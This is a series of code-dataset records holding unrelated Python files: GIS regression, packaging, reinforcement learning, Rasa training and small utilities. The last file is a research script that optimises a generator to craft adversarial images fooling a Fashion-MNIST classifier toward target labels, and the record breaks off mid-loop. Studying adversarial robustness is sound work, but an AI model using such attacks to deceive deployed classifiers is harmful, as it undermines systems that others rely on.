regression_array[:, len_array].reshape(len(regression_array[:, len_array]),\n len_array[-1]), regression_array[:, 0])\n self.SetCoef(self.lm.coef_)\n self.SetRSquare(self.lm.score(\n regression_array[:, len_array].reshape(len(regression_array[:, len_array]),\n len_array[-1]), regression_array[:, 0]))\n get_shape_open = gdal.Open(self.raster_list[1])\n get_shape = get_shape_open.ReadAsArray().astype(np.float)\n raster_shape = get_shape.shape\n get_shape_open = None\n base_array = np.full(raster_shape, self.lm.intercept_)\n self.SetIntercept(self.lm.intercept_)\n sublist =regression.InitializeRegression(self.regression_list,self.raster_list,self.lm.coef_)\n for i in sublist:\n base_array = np.add(base_array, i)\n self.outraster = base_array\n for cell in np.nditer(self.outraster, op_flags=['readwrite']):\n if cell < 0:\n cell[...] 
= 0\n\n def CreateRaster(self,outlocation):\n projection_raster = gdal.Open(self.raster_list[0])\n geotrans = projection_raster.GetGeoTransform()\n pixels_x = projection_raster.RasterXSize # Number of pixels wide\n pixels_y = projection_raster.RasterYSize # Number of pixels tall\n pixel_size = geotrans[1] # Pixel size (must be same in both directions)\n origin_x = geotrans[0] # Upper left corner X\n origin_y = geotrans[3] # Upper left corner Y\n driver = gdal.GetDriverByName('GTiff')\n output_raster = driver.Create(outlocation, pixels_x, pixels_y, 1, gdal.GDT_Float32)\n output_raster.SetGeoTransform((origin_x, pixel_size, 0, origin_y, 0, -pixel_size))\n output_raster_projection_wkt = projection_raster.GetProjection()\n output_raster.SetProjection(output_raster_projection_wkt)\n output_raster.GetRasterBand(1).WriteArray(self.outraster)\n output_raster.FlushCache()\n projection_raster = None\n return print('Output raster successfully written')\n def CreateExcel(self):\n pd_columns = ['Observation Value']\n for i in range(len(self.final_list[0][1:])):\n pd_columns.append('Raster {0} Value'.format(i))\n\n df = pd.DataFrame.from_records(self.final_list, columns=pd_columns)\n\n # Create a Pandas Excel writer using XlsxWriter as the engine.\n writer = pd.ExcelWriter('pandas_simple.xlsx', engine='xlsxwriter')\n\n # Convert the dataframe to an XlsxWriter Excel object.\n df.to_excel(writer, sheet_name='Regression Data')\n\n # Close the Pandas Excel writer and output the Excel file.\n writer.save()\n#if __name__ == '__main__':\n","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"193348481","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.1'\n\ntests_require = []\n\nsetup(\n name='scitran.reaper',\n version=version,\n description='Data collection service',\n classifiers=[\n 'Programming Language :: Python',\n ],\n keywords='scitran',\n author='Gunnar Schaefer',\n author_email='gsfr@stanford.edu',\n url='http://scitran.github.io/',\n packages=find_packages(),\n namespace_packages=['scitran'],\n install_requires=[\n 'pytz',\n 'tzlocal',\n 'requests',\n 'pydicom',\n 'numpy',\n 'nibabel',\n 'dcmstack',\n 'scitran.data',\n ],\n entry_points={\n 'console_scripts': [\n 'dicom_net_reaper=scitran.reaper.dicom_net_reaper:main',\n 'dicom_file_reaper=scitran.reaper.dicom_file_reaper:main',\n 'pfile_reaper=scitran.reaper.pfile_reaper:main',\n ],\n },\n tests_require=tests_require,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"190472132","text":"from torch.optim import Adam\nfrom all.agents import DDQN\nfrom all.approximation import QNetwork, FixedTarget\nfrom all.logging import DummyWriter\nfrom all.memory import PrioritizedReplayBuffer\nfrom all.optim import LinearScheduler\nfrom all.policies import GreedyPolicy\nfrom .models import dueling_fc_relu_q\n\n\ndef ddqn(\n # Common settings\n device=\"cpu\",\n discount_factor=0.99,\n # Adam optimizer settings\n lr=1e-3,\n # Training settings\n minibatch_size=64,\n update_frequency=1,\n target_update_frequency=100,\n # Replay buffer settings\n replay_start_size=1000,\n replay_buffer_size=10000,\n # Exploration settings\n initial_exploration=1.,\n final_exploration=0.,\n final_exploration_frame=10000,\n # Prioritized replay settings\n alpha=0.2,\n 
beta=0.6,\n):\n \"\"\"\n Dueling Double DQN with Prioritized Experience Replay (PER).\n\n Args:\n device (str): The device to load parameters and buffers onto for this agent.\n discount_factor (float): Discount factor for future rewards.\n last_frame (int): Number of frames to train.\n lr (float): Learning rate for the Adam optimizer.\n minibatch_size (int): Number of experiences to sample in each training update.\n update_frequency (int): Number of timesteps per training update.\n target_update_frequency (int): Number of timesteps between updates the target network.\n replay_start_size (int): Number of experiences in replay buffer when training begins.\n replay_buffer_size (int): Maximum number of experiences to store in the replay buffer.\n initial_exploration (int): Initial probability of choosing a random action,\n decayed until final_exploration_frame.\n final_exploration (int): Final probability of choosing a random action.\n final_exploration_frame (int): The frame where the exploration decay stops.\n alpha (float): Amount of prioritization in the prioritized experience replay buffer.\n (0 = no prioritization, 1 = full prioritization)\n beta (float): The strength of the importance sampling correction for prioritized experience replay.\n (0 = no correction, 1 = full correction)\n \"\"\"\n def _ddqn(env, writer=DummyWriter()):\n model = dueling_fc_relu_q(env).to(device)\n optimizer = Adam(model.parameters(), lr=lr)\n q = QNetwork(\n model,\n optimizer,\n target=FixedTarget(target_update_frequency),\n writer=writer\n )\n policy = GreedyPolicy(\n q,\n env.action_space.n,\n epsilon=LinearScheduler(\n initial_exploration,\n final_exploration,\n replay_start_size,\n final_exploration_frame,\n name=\"epsilon\",\n writer=writer\n )\n )\n replay_buffer = PrioritizedReplayBuffer(\n replay_buffer_size,\n alpha=alpha,\n beta=beta,\n device=device\n )\n return DDQN(q, policy, replay_buffer,\n discount_factor=discount_factor,\n replay_start_size=replay_start_size,\n update_frequency=update_frequency,\n minibatch_size=minibatch_size)\n return _ddqn\n\n\n__all__ = [\"ddqn\"]\n","sub_path":"all/presets/classic_control/ddqn.py","file_name":"ddqn.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"181246875","text":"import numpy as np\n\ndef inputData(path):\n\tx = y = np.array([])\n\twith open(path) as f:\n\t\tcontent = [(float(x.strip().split()[0]),float(x.strip().split()[1])) for x in f.readlines()]\n\t\n\t\tx = np.array([x[0] for x in content])\n\t\ty = np.array([x[1] for x in content])\n\t\tmaxVal = max(np.concatenate((x,y)))\n\t\tx = x/maxVal\n\t\ty = y/maxVal\n\n\treturn (x,y)\n\n#NVAR=len(x)","sub_path":"src/inputData.py","file_name":"inputData.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"396876271","text":"import argparse\nimport logging\nimport os\nimport tempfile\nfrom typing import Text, Dict, Optional\n\nimport rasa_core.cli.train\nfrom rasa_core import config, cli\nfrom rasa_core import utils\nfrom rasa_core.broker import PikaProducer\nfrom rasa_core.domain import TemplateDomain\nfrom rasa_core.interpreter import NaturalLanguageInterpreter\nfrom rasa_core.run import AvailableEndpoints\nfrom rasa_core.tracker_store import TrackerStore\nfrom rasa_core.training.dsl import StoryFileReader\nfrom rasa_core.utils import set_default_subparser\n\nlogger = logging.getLogger(__name__)\n\n\ndef 
create_argument_parser():\n \"\"\"Parse all the command line arguments for the training script.\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Train a dialogue model for Rasa Core. '\n 'The training will use your conversations '\n 'in the story training data format and '\n 'your domain definition to train a dialogue '\n 'model to predict a bots actions.')\n parent_parser = argparse.ArgumentParser(add_help=False)\n cli.train.add_general_args(parent_parser)\n\n subparsers = parser.add_subparsers(\n help='Training mode of core.',\n dest='mode')\n subparsers.required = True\n\n train_parser = subparsers.add_parser(\n 'default',\n help='train a dialogue model',\n parents=[parent_parser])\n compare_parser = subparsers.add_parser(\n 'compare',\n help='train multiple dialogue models to compare '\n 'policies',\n parents=[parent_parser])\n interactive_parser = subparsers.add_parser(\n 'interactive',\n help='teach the bot with interactive learning',\n parents=[parent_parser])\n\n cli.train.add_compare_args(compare_parser)\n cli.train.add_interactive_args(interactive_parser)\n cli.train.add_train_args(train_parser)\n\n return parser\n\n\ndef train(domain_file: Text, stories_file: Text, output_path: Text,\n interpreter: Optional[NaturalLanguageInterpreter] = None,\n endpoints: AvailableEndpoints = AvailableEndpoints(),\n dump_stories: bool = False,\n policy_config: Text = None,\n exclusion_percentage: int = None,\n kwargs: Optional[Dict] = None):\n from rasa_core.agent import Agent\n\n if not kwargs:\n kwargs = {}\n\n policies = config.load(policy_config)\n\n agent = Agent(domain_file,\n generator=endpoints.nlg,\n action_endpoint=endpoints.action,\n interpreter=interpreter,\n policies=policies)\n\n data_load_args, kwargs = utils.extract_args(kwargs,\n {\"use_story_concatenation\",\n \"unique_last_num_states\",\n \"augmentation_factor\",\n \"remove_duplicates\",\n \"debug_plots\"})\n\n training_data = agent.load_data(stories_file,\n exclusion_percentage=exclusion_percentage,\n **data_load_args)\n agent.train(training_data, **kwargs)\n agent.persist(output_path, dump_stories)\n\n return agent\n\n\ndef _additional_arguments(args):\n additional = {\n \"augmentation_factor\": args.augmentation,\n \"debug_plots\": args.debug_plots\n }\n # remove None values\n return {k: v for k, v in additional.items() if v is not None}\n\n\ndef train_comparison_models(stories,\n domain,\n output_path=\"\",\n exclusion_percentages=None,\n policy_configs=None,\n runs=1,\n dump_stories=False,\n kwargs=None):\n \"\"\"Train multiple models for comparison of policies\"\"\"\n\n exclusion_percentages = exclusion_percentages or []\n policy_configs = policy_configs or []\n\n for r in range(runs):\n logging.info(\"Starting run {}/{}\".format(r + 1, runs))\n\n for i in exclusion_percentages:\n current_round = exclusion_percentages.index(i) + 1\n\n for policy_config in policy_configs:\n policies = config.load(policy_config)\n\n if len(policies) > 1:\n raise ValueError(\"You can only specify one policy per \"\n \"model for comparison\")\n\n policy_name = type(policies[0]).__name__\n output = os.path.join(output_path, 'run_' + str(r + 1),\n policy_name +\n str(current_round))\n\n logging.info(\"Starting to train {} round {}/{}\"\n \" with {}% exclusion\"\n \"\".format(policy_name, current_round,\n len(exclusion_percentages), i))\n\n train(\n domain, stories, output,\n policy_config=policy_config,\n exclusion_percentage=i,\n kwargs=kwargs,\n dump_stories=dump_stories)\n\n\ndef get_no_of_stories(story_file, domain):\n \"\"\"Get 
number of stories in a file.\"\"\"\n\n stories = StoryFileReader.read_from_folder(story_file,\n TemplateDomain.load(domain))\n return len(stories)\n\n\ndef do_default_training(cmdline_args, stories, additional_arguments):\n \"\"\"Train a model.\"\"\"\n\n train(domain_file=cmdline_args.domain,\n stories_file=stories,\n output_path=cmdline_args.out,\n dump_stories=cmdline_args.dump_stories,\n policy_config=cmdline_args.config[0],\n kwargs=additional_arguments)\n\n\ndef do_compare_training(cmdline_args, stories, additional_arguments):\n train_comparison_models(stories,\n cmdline_args.domain,\n cmdline_args.out,\n cmdline_args.percentages,\n cmdline_args.config,\n cmdline_args.runs,\n cmdline_args.dump_stories,\n additional_arguments)\n\n no_stories = get_no_of_stories(cmdline_args.stories,\n cmdline_args.domain)\n\n # store the list of the number of stories present at each exclusion\n # percentage\n story_range = [no_stories - round((x / 100.0) * no_stories)\n for x in cmdline_args.percentages]\n\n story_n_path = os.path.join(cmdline_args.out, 'num_stories.json')\n utils.dump_obj_as_json_to_file(story_n_path, story_range)\n\n\ndef do_interactive_learning(cmdline_args, stories, additional_arguments=None):\n _endpoints = AvailableEndpoints.read_endpoints(cmdline_args.endpoints)\n _interpreter = NaturalLanguageInterpreter.create(cmdline_args.nlu,\n _endpoints.nlu)\n from rasa_core.agent import Agent\n from rasa_core.training import interactive\n\n if cmdline_args.core:\n if cmdline_args.finetune:\n raise ValueError(\"--core can only be used without \"\n \"--finetune flag.\")\n\n logger.info(\"Loading a pre-trained model. This means that \"\n \"all training-related parameters will be ignored.\")\n\n _broker = PikaProducer.from_endpoint_config(_endpoints.event_broker)\n _tracker_store = TrackerStore.find_tracker_store(\n None,\n _endpoints.tracker_store,\n _broker)\n\n _agent = Agent.load(cmdline_args.core,\n interpreter=_interpreter,\n generator=_endpoints.nlg,\n tracker_store=_tracker_store,\n action_endpoint=_endpoints.action)\n else:\n if cmdline_args.out:\n model_directory = cmdline_args.out\n else:\n model_directory = tempfile.mkdtemp(suffix=\"_core_model\")\n\n _agent = train(cmdline_args.domain,\n stories,\n model_directory,\n _interpreter,\n _endpoints,\n cmdline_args.dump_stories,\n cmdline_args.config[0],\n None,\n additional_arguments)\n\n interactive.run_interactive_learning(\n _agent, stories,\n finetune=cmdline_args.finetune,\n skip_visualization=cmdline_args.skip_visualization)\n\n\nif __name__ == '__main__':\n\n # Running as standalone python application\n arg_parser = create_argument_parser()\n set_default_subparser(arg_parser, 'default')\n cmdline_arguments = arg_parser.parse_args()\n additional_args = _additional_arguments(cmdline_arguments)\n\n utils.configure_colored_logging(cmdline_arguments.loglevel)\n\n training_stories = rasa_core.cli.train.stories_from_cli_args(\n cmdline_arguments)\n\n if cmdline_arguments.mode == 'default':\n do_default_training(cmdline_arguments,\n training_stories,\n additional_args)\n\n elif cmdline_arguments.mode == 'interactive':\n do_interactive_learning(cmdline_arguments,\n training_stories,\n additional_args)\n\n elif cmdline_arguments.mode == 'compare':\n do_compare_training(cmdline_arguments,\n training_stories,\n additional_args)\n","sub_path":"rasa_core/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} 
+{"seq_id":"140806777","text":"from garbage import Garbage\nfrom paper_garbage import PaperGarbage\nfrom plastic_garbage import PlasticGarbage\nfrom dustbin_content_error import DustbinContentError\n\n\nclass Dustbin:\n\n def __init__(self, color):\n self.color = color\n self.paper_content = []\n self.plastic_content = []\n self.house_waste_content = []\n\n def throw_out_garbage(self, garbage): # sort garbage based on type\n if isinstance(garbage, Garbage):\n if isinstance(garbage, PlasticGarbage):\n if garbage.is_clean: # if clean, goes into plastic, otherwise can't be thrown away\n self.plastic_content.append(garbage)\n else:\n raise DustbinContentError\n elif isinstance(garbage, PaperGarbage):\n if garbage.is_squeezed: # if squeezed, goes into paper, otherwise can't be thrown away\n self.paper_content.append(garbage)\n else:\n raise DustbinContentError\n else: # not plastic nor paper\n self.house_waste_content.append(garbage)\n else: # not in garbage type\n raise DustbinContentError\n\n def empty_contents(self): # empties the garbage lists\n del self.paper_content[:]\n del self.plastic_content[:]\n del self.house_waste_content[:]\n","sub_path":"dustbin.py","file_name":"dustbin.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"479415374","text":"def to_int_list(l, split):\n l = l.split(split)\n l = all_to_int(l)\n return l\n\n\ndef all_to_int(x):\n while \"null\" in x:\n x.remove(\"null\")\n for i in range(len(x)):\n x[i] = int(x[i])\n return x\n\n\nnum = int(input())\nrec = []\nfor i in range(num):\n rec.append(to_int_list(input(), \" \"))\nres = \"YES\"\ntemp = []\nfor i in range(num):\n if i == 0:\n temp.append(max(rec[0][1], rec[0][1]))\n else:\n m = max(rec[i][0], rec[i][1])\n if m <= temp[i-1]:\n temp.append(m)\n elif min(rec[i][0], rec[i][1]) > temp[i-1]:\n res = \"NO\"\n break\n else:\n temp.append(min(rec[i][0], rec[i][1]))\nprint(res)","sub_path":"Code/CodeRecords/2910/60719/292991.py","file_name":"292991.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409817778","text":"import tensorflow as tf\nfrom keras.utils import np_utils\nimport glob\n#import imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n#import PIL\nfrom tensorflow.keras import layers\nimport timeit\nimport time\n\n#from skimage.measure import compare_ssim\nfrom skimage.measure import compare_ssim\n\nimport pickle\n\nimport pydot\nimport graphviz\n\nfrom numpy import linalg as LA\n\nfrom IPython import display\n\nfrom tensorflow.keras import Input, Model\n\nfrom keras.models import load_model\n\n\n\n#####################################################################\n################### get_S_function\n#####################################################################\ndef get_S_function(M,r):\n '''\n\n :param M: is the number of labels\n :param r: the labels we want to take out\n :return: [M]\\r, where [M] := {0,1,2,...,M-1}\n '''\n all_M = np.arange(0, M)\n return np.setdiff1d(all_M,r)\n#########################################################################################################################################\n\n\n#####################################################################\n################### get_S_function\n#####################################################################\ndef sup_lbl_from_lbl_2(input_lbl):\n\n\n if input_lbl==0 or input_lbl==2 or 
\n\n#####################################################################\n################### sup_lbl_from_lbl_2\n#####################################################################\ndef sup_lbl_from_lbl_2(input_lbl):\n    '''Maps a fine label (0-9) to one of three super-labels (0-2).'''\n\n    if input_lbl==0 or input_lbl==2 or input_lbl==6:\n        sup_lbl_from_lbl = 0\n    elif input_lbl==1 or input_lbl==5 or input_lbl==7 or input_lbl==9:\n        sup_lbl_from_lbl = 1\n    elif input_lbl == 3 or input_lbl == 4 or input_lbl == 8:\n        sup_lbl_from_lbl = 2\n\n    return sup_lbl_from_lbl\n#########################################################################################################################################\n\n\n#########################################################################################################################################\n############################### relu_scaler_Ismail ######\n#########################################################################################################################################\ndef relu_scaler_Ismail(x):\n    '''\n    :param x: scalar\n    :return: y=relu(x)\n    '''\n    y=0\n    if x >= 0:\n        y=x\n    else:\n        y=0\n    return y\n#########################################################################################################################################\n\n\n#########################################################################################################################################\n############################### SSIM function ######\n#########################################################################################################################################\ndef SSIM_index(imageA, imageB):\n\n    imageA = imageA.reshape(28, 28)\n    imageB = imageB.reshape(28, 28)\n\n    # rho_inf = LA.norm(input_image.reshape(784, 1) - X_test_pert[idx].reshape(784, 1) , np.inf)\n    (D_s, diff) = compare_ssim(imageA, imageB, full=True)\n    return D_s\n#########################################################################################################################################\n\n\n\n#########################################################################################################################################\n############################### targeted super-label table (pickled) ######\n#########################################################################################################################################\n\ntargeted_super_label_confer = pickle.load(open(\"/home/ismail/pycharmProjects/SSLTL_project/RL_adv_attacks_LP/targeted_super_label_confer.p\",\"rb\"))\n\n#########################################################################################################################################\n\n\n##########################################################################################\n############################### jensen shannon divergence function ######\n##########################################################################################\n\"\"\"\nA normalized and stable version of the KL divergence; it returns values in [0,1],\nwhere 0 means the two distributions are identical.\n\"\"\"\n\nfrom scipy.spatial.distance import jensenshannon\n\nfrom math import log2\ndef D_JS_PMFs(p, q):\n    # D_JS_PMFs(p,q) = D_JS_PMFs(q,p); scipy returns the JS distance (square root of the divergence)\n    return jensenshannon(p, q, base=2)\n
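\n# Sanity examples (illustrative): identical PMFs give 0.0, e.g.\n# D_JS_PMFs([0.5, 0.5], [0.5, 0.5]) == 0.0, while disjoint PMFs give 1.0,\n# e.g. D_JS_PMFs([1, 0], [0, 1]) == 1.0 with base=2.\n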
\n\n####################################################################################\n################################ some dataset - MNIST fashion\n####################################################################################\n\n# download mnist data and split into train and test sets\n(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.fashion_mnist.load_data()\n# reshape data to fit model\nX_train = train_images.reshape(train_images.shape[0], 28, 28, 1)\nX_test = test_images.reshape(test_images.shape[0], 28, 28, 1)\nX_train, X_test = X_train/255, X_test/255\n# normalization:\ntrain_images = train_images / 255\ntest_images = test_images / 255\ny_test = np_utils.to_categorical(test_labels,10)\n# ###############################################\n\n\n####################################################################################\n################################ load trained model(s) and freeze\n####################################################################################\n\n# trained model for the MNIST fashion used for the FHC with 1D input and \\in [0,1]\ntrained_model = tf.keras.models.load_model('my_model_1d_last_dense_activation_seperate')\n# test the CA of the model = 90.09\n#X_test = 2*X_test - 1\n#results = trained_model.evaluate(X_test, y_test)\n#print(\"test loss, test acc:\", results)\n\n######## freeze trained_model\nfor layer in trained_model.layers:\n    layer.trainable = False\n\n\n\n\nnumber_of_observations = 5\nsucc=0\nD_ssim_images_save = []\nD_JS_save = []\nrun_time_save = []\n\nBOSS_images = []\n\nfor idx in range(number_of_observations):\n    start = timeit.default_timer()\n    ########################################################################################\n    ###########################################################################\n    #################################### BUILDING THE gen model g(z,\\phi)\n    ###########################################################################\n\n    gen_NN = tf.keras.Sequential()\n    initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.05, seed=102)\n    ## ADDING THE GEN MODEL layers that will be trained\n\n    layer = layers.Dense(7 * 7 * 256, use_bias=False, input_shape=(100,), name='dense_gen', kernel_initializer=initializer)\n    layer.trainable=True\n    gen_NN.add(layer)\n\n    layer = layers.BatchNormalization()\n    layer.trainable=True\n    gen_NN.add(layer)\n\n    layer = layers.LeakyReLU()\n    layer.trainable=True\n    gen_NN.add(layer)\n\n    layer = layers.Reshape((7, 7, 256),name='reshape_gen')\n    layer.trainable=True\n    gen_NN.add(layer)\n    #assert combined_NN.output_shape == (None, 7, 7, 256)\n\n    layer = layers.Conv2DTranspose(128, (5, 5), strides=(1, 1), padding='same', use_bias=False, kernel_initializer=initializer)\n    layer.trainable=True\n    gen_NN.add(layer)\n    #assert gen_NN.output_shape == (None, 14, 14, 64)\n\n    layer = layers.BatchNormalization()\n    layer.trainable=True\n    gen_NN.add(layer)\n\n    layer = layers.LeakyReLU()\n    layer.trainable=True\n    gen_NN.add(layer)\n\n    layer = layers.Conv2DTranspose(64, (5, 5), strides=(2, 2), padding='same', use_bias=False, kernel_initializer=initializer)\n    layer.trainable=True\n    gen_NN.add(layer)\n    #assert gen_NN.output_shape == (None, 14, 14, 64)\n\n    layer = layers.BatchNormalization()\n    layer.trainable=True\n    gen_NN.add(layer)\n\n    layer = layers.LeakyReLU()\n    layer.trainable=True\n    gen_NN.add(layer)\n\n    layer = layers.Conv2DTranspose(1, (5, 5), strides=(2, 2), padding='same', use_bias=False, activation='sigmoid', kernel_initializer=initializer)\n    layer.trainable=True\n    gen_NN.add(layer)\n\n\n    # below is added for the 1D modification\n    layer = layers.Reshape((784, 1, 1),name='reshape_gen_final')\n    layer.trainable=True\n    gen_NN.add(layer)\n\n\n\n\n    #########################################################################################################################################\n    ############################### this is NOT sequential training (training two loss functions from different heads of the NN) ######\n    #########################################################################################################################################\n
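\n    # Combined objective that the compile call below implements (sketch):\n    #     L(psi) = lambda_gen * MSE(g(z), X_desired) + lambda_pmf * CE(f(g(z)), desired_PMF)\n    # where f (the trained classifier) stays frozen and only the generator g is updated.\n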
#########################################################################################################################################\n\n ### define X_d as the desired image\n X_desired = X_test[idx]\n\n # these two need to have the same values as of now since X_train is the same for both\n batch_size_gen = 80\n batch_size_2 = 80\n\n\n #################### training steps and stopping thresholds\n delta_s = 0.25\n\n delta_js = 0.35\n delta_ssim = 0.80\n\n delta_c = 0.25\n\n training_steps = 10\n\n ############################################################\n ### automated construction of the desired PMF y_d (for confidence reduction)\n ################################################################\n number_of_classes = 10\n # take the predicted class instead of the true label\n #target_class = test_labels[idx]\n target_class = np.argmax(trained_model(X_desired.reshape(1, 784, 1)).numpy()[0])\n\n target_super_label = targeted_super_label_confer[idx]\n\n if target_super_label == 0:\n S_T = [0,2,6]\n if target_super_label == 1:\n S_T = [1,5,7,9]\n if target_super_label == 2:\n S_T = [3,4,8]\n\n S_T = np.array(S_T)\n\n S_T_comp = get_S_function(10, S_T)\n\n output_predictions = trained_model(X_desired.reshape(1, 784, 1)).numpy()[0]\n\n output_predictions[S_T_comp] = -100\n\n desired_target_j_star = np.argmax(output_predictions)\n\n desired_PMF = np.zeros(shape=(1, number_of_classes))\n desired_PMF[0][desired_target_j_star] = 1\n\n # # if Targeted finer label is given, then immediately do:\n # desired_PMF = np.zeros(shape=(1, number_of_classes))\n # desired_PMF[0][target_finer] = 1\n\n ################################################################\n ##### X_train is the same for both gen and combined models #####\n ################################################################\n # build x_train as some random input and y_train to be the desired image\n # X_train is the same as z in the paper\n\n # create one vector and repeat\n X_train_one = tf.random.uniform(shape=[1,100], minval=0., maxval=1., seed=101)\n X_train_one_np = X_train_one.numpy()\n X_train_np = np.zeros(shape=(batch_size_gen,100))\n for i in range(batch_size_gen):\n X_train_np[i,:] = X_train_one_np\n X_train = tf.convert_to_tensor(X_train_np, dtype=tf.float32)\n X_val_np = X_train_one_np\n X_val = tf.convert_to_tensor(X_val_np, dtype=tf.float32)\n\n\n ############################################################\n ### Y_train_gen for the gen model (which is the image)\n ################################################################\n\n # below is for the 1D image\n Y_train_np_gen = np.zeros(shape=(batch_size_gen,784,1,1))\n Y_val_gen = X_desired.reshape(1,784,1,1)\n for i in range(batch_size_gen):\n Y_train_np_gen[i,:,:,:] = Y_val_gen.reshape(784,1,1)\n # convert Y_train to tf eager tensor\n Y_train_gen = tf.convert_to_tensor(Y_train_np_gen, dtype=tf.float32)\n\n\n ############################################################\n ### Y_train_combined is the y_d (desired PMF)\n ################################################################\n\n Y_train_combined = np.zeros(shape=(batch_size_2,10))\n\n Y_val_combined = desired_PMF\n\n for i in range(batch_size_2):\n Y_train_combined[i,:] = Y_val_combined\n\n Y_desired = Y_val_combined[0]\n\n print('break')\n\n\n ####################################################################################################################\n ### defining the combined model such that it is the composition of g, then f ==> this is defining model h in the paper\n 
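### NOTE (added sketch, using only names that appear below): with the Keras functional API,\n ### h stacks the trainable generator g on top of the frozen classifier f, conceptually\n ### z = Input(shape=100); x = g(z); y = f(x); h = Model(z, [x, y])\n ### so a single fit() call can supervise both the generated image and its predicted PMF\n 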
#############################################################################################################################\n\n input = Input(shape=100)\n\n x = gen_NN.layers[0](input)\n for lay in range(len(gen_NN.layers) - 1):\n layer = gen_NN.layers[lay+1]\n layer.trainable = True\n x = layer(x)\n out_1 = x\n\n\n x_2 = trained_model.layers[0](x)\n for lay in range(len(trained_model.layers) - 1):\n layer = trained_model.layers[lay + 1]\n layer.trainable = False\n x_2 = layer(x_2)\n out_2 = x_2\n\n\n ### defining the model: this is h(z,\\psi)\n combined_NN = Model(input, [out_1, out_2])\n\n ### defining the optimizer\n optimizer = tf.keras.optimizers.Adam(learning_rate=0.05)\n\n loss_1 = tf.keras.losses.MeanSquaredError(name='LOSS_1')\n\n loss_2 = tf.keras.losses.CategoricalCrossentropy(name='LOSS_2', from_logits=False,label_smoothing=0)\n\n dynamic_weights_selection = True\n # initial loss function weights\n lambda_gen = 1\n lambda_pmf = 0.01\n\n ############# TRAINING LOOP\n for i in range(training_steps):\n\n\n combined_NN.compile(optimizer=optimizer, loss=[loss_1, loss_2], loss_weights=[lambda_gen, lambda_pmf])\n # for lay in range(18):\n # if lay >= 12:\n # layer = combined_NN.layers[lay]\n # layer.trainable = False\n\n # training\n combined_NN.fit(X_train,[Y_train_gen, Y_train_combined], epochs=1, batch_size=1, validation_data=(X_val, [Y_val_gen,Y_val_combined]), verbose=0 )\n #combined_NN.train_on_batch(X_train, [Y_train_gen, Y_train_combined])\n # fake image at step i ==> this is X in the paper and X_val is z in the paper\n fake_image = combined_NN(X_val)[0].numpy().reshape(28, 28)\n\n\n #trained_model = load_model(\"MNIST_digits_trained_model_3.h5\")\n trained_model = tf.keras.models.load_model('my_model_1d_last_dense_activation_seperate')\n output_vector_probabilities = trained_model(fake_image.reshape(1, 28, 28, 1)).numpy()[0]\n #output_vector_probabilities = combined_NN(X_val)[1].numpy().reshape(10,)\n\n # D_2 distance between real image and fake image at step i ==> this is equation (9)\n D_2_s = LA.norm(X_desired.reshape(784,) - fake_image.reshape(784,), 2)\n # SSIM distance between real image and fake image at step i ==>\n D_ssim_images = SSIM_index(X_desired, fake_image)\n # D_2 distance between desired PMF and the PMF returned by the fake image ==> this is equation (3)\n D_2 = LA.norm(output_vector_probabilities-Y_desired, 2 )\n # D_JS: JS divergence distance between desired and actual PMFs (it uses KL divergence)\n D_JS = D_JS_PMFs(output_vector_probabilities, Y_desired)\n\n\n ### THE STOPPING EXIT CRITERIA\n if D_ssim_images >= delta_ssim and D_JS <= delta_js:\n #print('BREAKING FOR IS USED with Distance SSIM = ', D_ssim_images, ' and D_JS = ', D_JS)\n break\n\n ### logger:\n #print('training step = ', i, '; image SSIM = ', D_ssim_images, ' ; PMF_JS_Distance = ', D_JS, ' ; current loss weights = ', lambda_gen,' , ', lambda_pmf )\n\n ##### dynamic weight selection option in training\n if dynamic_weights_selection is True:\n lambda_gen = relu_scaler_Ismail(lambda_gen - 0.01 * 1 * ((D_ssim_images/delta_ssim)) * np.sign((D_ssim_images/delta_ssim)-1))\n lambda_pmf = relu_scaler_Ismail(lambda_pmf - 0.05 * 0.01 * ((delta_js/D_JS)) * np.sign((delta_js/D_JS )-1))\n else:\n lambda_gen = 1\n lambda_pmf = 0.01\n\n\n ### SAVE THE DISTANCE AND PERTURBED IMAGE SO AS TO TAKE THE MINIMUM AT THE END OF THE TRAINING STEP (THIS IS TO OVERCOME OVERFITTING DURING TRAINING)\n\n\n\n fake_image = combined_NN(X_val)[0].numpy().reshape(28,28)\n\n ### below is the same thing (just for sanity 
